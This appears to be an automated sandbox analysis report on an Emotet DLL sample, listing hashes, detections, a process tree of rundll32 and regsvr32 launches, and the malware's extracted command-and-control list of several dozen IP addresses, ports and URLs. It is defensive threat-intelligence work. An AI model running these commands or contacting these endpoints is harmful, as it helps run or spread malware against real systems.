Edit tour

Windows Analysis Report
U9M1w8FHBW.exe

Overview

General Information

Sample Name:	U9M1w8FHBW.exe (renamed file extension from exe to dll)
Analysis ID:	745001
MD5:	deab9f2826fa9d755e77a010c51effb8
SHA1:	a44e1cd6ca3c8c7bad9ad286ba9e19ab2a6e8190
SHA256:	b3dbb3902ed3e35a1f314f2b9385c2f020d4182cf0e93a9157cb0275548d72cc
Tags:	dllexe
Infos:

Detection

Emotet

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Snort IDS alert for network traffic

Creates an autostart registry key pointing to binary in C:\Windows

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Connects to several IPs in different countries

Registers a DLL

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll64.exe (PID: 5144 cmdline: loaddll64.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6)

conhost.exe (PID: 1128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 3808 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

rundll32.exe (PID: 1972 cmdline: rundll32.exe "C:\Users\user\Desktop\U9M1w8FHBW.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)

regsvr32.exe (PID: 4808 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DChihhZAEIop\NZICbhYKmnAVT.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 3360 cmdline: regsvr32.exe /s C:\Users\user\Desktop\U9M1w8FHBW.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 4516 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\YKYTbOgY\pyluVjQOzYMsbAJk.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

rundll32.exe (PID: 5552 cmdline: rundll32.exe C:\Users\user\Desktop\U9M1w8FHBW.dll,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)

regsvr32.exe (PID: 4144 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AvyZUmIIeGJLvcye\aPdTkvBLdrznCXG.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 3192 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\DahdrCXRHjoqlqPu\vvcfbAnuZpuTsj.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 1788 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\DChihhZAEIop\NZICbhYKmnAVT.dll MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 4784 cmdline: C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\OQOuTpy\WqdnfVdfYCxIlc.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.768069607.0000000001040000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.410373620.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.409459454.0000000000C70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.263891789.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.258125944.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.261350694.0000000002080000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.264795358.00000188495D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.263846204.000002A683620000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.769531041.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.262118091.0000000180001000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.258558798.000002735FB40000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
17.2.regsvr32.exe.c70000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.1040000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.188495d0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.regsvr32.exe.c70000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll64.exe.2a683620000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.2080000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.2735fb40000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll64.exe.2a683620000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.regsvr32.exe.2080000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.188495d0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.2735fb40000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.regsvr32.exe.1040000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 3 - Source IP: 192.168.2.6 - Destination IP: 115.178.55.22

Timestamp:	192.168.2.6115.178.55.2249714802404304 11/13/22-16:55:33.271971
SID:	2404304
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: U9M1w8FHBW.dll

Virustotal: Detection: 45%

Perma Link

Source: 00000006.00000002.768243085.0000000001088000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"]}

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD14679410 CryptStringToBinaryA,CryptStringToBinaryA,		0_2_00007FFD14679410
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFD14679410 CryptStringToBinaryA,CryptStringToBinaryA,		3_2_00007FFD14679410

Source: U9M1w8FHBW.dll

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD1466C334 FindFirstFileExW,		0_2_00007FFD1466C334
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00007FFD1466C334 FindFirstFileExW,		3_2_00007FFD1466C334

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 115.178.55.22 80			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 172.105.115.71 8080			Jump to behavior

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.6:49714 -> 115.178.55.22:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 172.105.115.71:8080
Source: Malware configuration extractor	IPs: 218.38.121.17:443
Source: Malware configuration extractor	IPs: 186.250.48.5:443
Source: Malware configuration extractor	IPs: 103.71.99.57:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 85.25.120.45:8080
Source: Malware configuration extractor	IPs: 139.196.72.155:8080
Source: Malware configuration extractor	IPs: 103.85.95.4:8080
Source: Malware configuration extractor	IPs: 198.199.70.22:8080
Source: Malware configuration extractor	IPs: 209.239.112.82:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 36.67.23.59:443
Source: Malware configuration extractor	IPs: 104.244.79.94:443
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 103.56.149.105:8080
Source: Malware configuration extractor	IPs: 80.211.107.116:8080
Source: Malware configuration extractor	IPs: 93.104.209.107:8080
Source: Malware configuration extractor	IPs: 174.138.33.49:7080
Source: Malware configuration extractor	IPs: 202.28.34.99:8080
Source: Malware configuration extractor	IPs: 178.62.112.199:8080
Source: Malware configuration extractor	IPs: 114.79.130.68:443
Source: Malware configuration extractor	IPs: 118.98.72.86:443
Source: Malware configuration extractor	IPs: 103.41.204.169:8080
Source: Malware configuration extractor	IPs: 178.238.225.252:8080
Source: Malware configuration extractor	IPs: 83.229.80.93:8080
Source: Malware configuration extractor	IPs: 46.101.98.60:8080
Source: Malware configuration extractor	IPs: 82.98.180.154:7080
Source: Malware configuration extractor	IPs: 87.106.97.83:7080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 139.59.80.108:8080
Source: Malware configuration extractor	IPs: 103.224.241.74:8080
Source: Malware configuration extractor	IPs: 103.254.12.236:7080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 165.22.254.236:8080
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 51.75.33.122:443
Source: Malware configuration extractor	IPs: 128.199.217.206:443
Source: Malware configuration extractor	IPs: 188.165.79.151:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 160.16.143.191:8080
Source: Malware configuration extractor	IPs: 175.126.176.79:8080
Source: Malware configuration extractor	IPs: 202.134.4.210:7080
Source: Malware configuration extractor	IPs: 103.126.216.86:443
Source: Malware configuration extractor	IPs: 190.145.8.4:443
Source: Malware configuration extractor	IPs: 128.199.242.164:8080
Source: Malware configuration extractor	IPs: 64.227.55.231:8080

Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	IP Address: 172.105.115.71 172.105.115.71
Source: Joe Sandbox View	IP Address: 188.165.79.151 188.165.79.151

Source: unknown

Network traffic detected: IP country count 20

Source: unknown	TCP traffic detected without corresponding DNS query: 115.178.55.22
Source: unknown	TCP traffic detected without corresponding DNS query: 115.178.55.22
Source: unknown	TCP traffic detected without corresponding DNS query: 115.178.55.22
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71
Source: unknown	TCP traffic detected without corresponding DNS query: 172.105.115.71

Source: regsvr32.exe, 00000006.00000003.407880962.000000000111D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.407682460.000000000111D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768642204.000000000111D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000006.00000003.407880962.000000000111D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.407682460.000000000111D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768642204.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000006.00000002.768807673.0000000001157000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b14de6da86b7d
Source: regsvr32.exe, 00000006.00000003.407880962.000000000111D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.407682460.000000000111D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768642204.000000000111D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabPa
Source: regsvr32.exe, 00000006.00000003.408031746.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.408084828.00000000010DD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768492623.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enU
Source: regsvr32.exe, 00000006.00000003.495564956.0000000001106000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.408031746.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.495650416.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.407564548.0000000001106000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768591524.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://172.105.115.71:8080/cwaajpktaow/wluuqgbutatftfws/jndwc/hjilgypgsuce/
Source: regsvr32.exe, 00000006.00000003.408031746.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.408084828.00000000010DD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.768492623.00000000010DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://172.105.115.71:8080/s.dll6

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 17.2.regsvr32.exe.c70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1040000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.188495d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.2a683620000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2080000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2735fb40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll64.exe.2a683620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.2080000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.188495d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2735fb40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.1040000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.768069607.0000000001040000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.410373620.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.409459454.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.263891789.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.258125944.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.261350694.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.264795358.00000188495D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.263846204.000002A683620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.769531041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.262118091.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.258558798.000002735FB40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\rundll32.exe

File deleted: C:\Windows\System32\DChihhZAEIop\NZICbhYKmnAVT.dll:Zone.Identifier

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

File created: C:\Windows\system32\DahdrCXRHjoqlqPu\

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD14673FB0	0_2_00007FFD14673FB0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD14671910	0_2_00007FFD14671910
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD1466C334	0_2_00007FFD1466C334
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD1466ABC0	0_2_00007FFD1466ABC0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00007FFD1466A370	0_2_00007FFD1466A370
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180020454	0_2_0000000180020454
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180028C94	0_2_0000000180028C94
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800038A5	0_2_00000001800038A5
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800248E0	0_2_00000001800248E0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005DB4	0_2_0000000180005DB4
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180004DDC	0_2_0000000180004DDC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000B1E0	0_2_000000018000B1E0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009E38	0_2_0000000180009E38
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180003BE8	0_2_0000000180003BE8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009BEC	0_2_0000000180009BEC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800173F8	0_2_00000001800173F8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180017BF8	0_2_0000000180017BF8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180015400	0_2_0000000180015400
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001000	0_2_0000000180001000
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000741C	0_2_000000018000741C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000E828	0_2_000000018000E828
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180002834	0_2_0000000180002834
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180014C48	0_2_0000000180014C48
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018002005C	0_2_000000018002005C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180016464	0_2_0000000180016464
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005478	0_2_0000000180005478
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180006880	0_2_0000000180006880
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018002748C	0_2_000000018002748C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001308C	0_2_000000018001308C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180024098	0_2_0000000180024098
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001B898	0_2_000000018001B898
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000C498	0_2_000000018000C498
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180004CA0	0_2_0000000180004CA0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800110AC	0_2_00000001800110AC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800148B0	0_2_00000001800148B0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800078B6	0_2_00000001800078B6
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001CCC	0_2_0000000180001CCC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000B8D0	0_2_000000018000B8D0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800198DC	0_2_00000001800198DC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800038DC	0_2_00000001800038DC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800264F8	0_2_00000001800264F8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800084F8	0_2_00000001800084F8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000BD00	0_2_000000018000BD00
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180015508	0_2_0000000180015508
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180018D0C	0_2_0000000180018D0C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180012110	0_2_0000000180012110
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001B520	0_2_000000018001B520
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180029124	0_2_0000000180029124
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180013524	0_2_0000000180013524
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009D24	0_2_0000000180009D24
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180023D28	0_2_0000000180023D28
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180002128	0_2_0000000180002128
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180020930	0_2_0000000180020930
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180009144	0_2_0000000180009144
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001F550	0_2_000000018001F550
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180020D54	0_2_0000000180020D54
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180010954	0_2_0000000180010954
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180018560	0_2_0000000180018560
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000E570	0_2_000000018000E570
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001C974	0_2_000000018001C974
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000F174	0_2_000000018000F174
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180025D84	0_2_0000000180025D84
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180005590	0_2_0000000180005590
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180017198	0_2_0000000180017198
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800159A0	0_2_00000001800159A0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180011DAC	0_2_0000000180011DAC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000D1AC	0_2_000000018000D1AC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800069C0	0_2_00000001800069C0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000A1D4	0_2_000000018000A1D4
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800079D8	0_2_00000001800079D8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001C1DC	0_2_000000018001C1DC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000D1E0	0_2_000000018000D1E0
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800199E8	0_2_00000001800199E8
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_00000001800099EC	0_2_00000001800099EC
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180028A04	0_2_0000000180028A04
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001FA08	0_2_000000018001FA08
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001E614	0_2_000000018001E614
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001A1C	0_2_0000000180001A1C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000BA24	0_2_000000018000BA24
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180021A2C	0_2_0000000180021A2C
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180019230	0_2_0000000180019230
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018000BE34	0_2_000000018000BE34
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180012244	0_2_0000000180012244
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180006650	0_2_0000000180006650
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180001660	0_2_0000000180001660
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_0000000180011664	0_2_0000000180011664
Source: C:\Windows\System32\loaddll64.exe	Code function: 0_2_000000018001827C	0_2_000000018001827C
